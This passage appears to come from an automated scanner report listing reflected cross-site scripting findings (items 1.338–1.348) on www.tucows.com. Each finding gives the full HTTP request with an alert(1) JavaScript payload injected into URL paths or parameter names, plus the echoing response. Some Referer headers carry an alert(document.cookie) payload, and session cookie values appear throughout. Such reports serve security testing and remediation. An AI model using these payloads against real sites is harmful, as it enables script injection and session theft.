<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/sitemap.htmlcaf6a"-alert(1)-"44f43ba9b50";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.338. http://www.tucows.com/images/newassets/sitemap.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/sitemap.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 220eb"-alert(1)-"e4076721429 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/sitemap.html?220eb"-alert(1)-"e4076721429=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.339. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33aa5"-alert(1)-"59cc111f4af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images33aa5"-alert(1)-"59cc111f4af/newassets/terms.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.340. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b47ad"-alert(1)-"799fe703e28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassetsb47ad"-alert(1)-"799fe703e28/terms.html";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.341. http://www.tucows.com/images/newassets/terms.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 102d4"-alert(1)-"f3c9b91e18e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:28:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/terms.html102d4"-alert(1)-"f3c9b91e18e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.342. http://www.tucows.com/images/newassets/terms.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/terms.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5eabf"-alert(1)-"20d1d0ffbba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/terms.html?5eabf"-alert(1)-"20d1d0ffbba=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.343. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2fb"-alert(1)-"6d8934a62dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:37 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31900

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includesae2fb"-alert(1)-"6d8934a62dd/corpbar/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.344. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f85d"-alert(1)-"109c256849a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:46 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar3f85d"-alert(1)-"109c256849a/cb3.0/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.345. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b6fb"-alert(1)-"fc67c6d109f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:22:56 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.01b6fb"-alert(1)-"fc67c6d109f/css/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.346. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45e8b"-alert(1)-"4bed83e5cce was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 33078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.0/css45e8b"-alert(1)-"4bed83e5cce/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.347. http://www.tucows.com/includes/corpbar/cb3.0/css/style.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/corpbar/cb3.0/css/style.css

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1a29"-alert(1)-"d118442f3f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9 HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:23:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32137

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/includes/corpbar/cb3.0/css/style.csse1a29"-alert(1)-"d118442f3f9";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.348. http://www.tucows.com/includes/js/aalib.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /includes/js/aalib.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49df9"-alert(1)-"7cec1abd243 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes49df9"-alert(1)-"7cec1abd243/js/aalib.js HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www.tucows.com/previewf2a0f%22-alert(document.cookie)-%22d3b3f7c7cb3/194850/x22
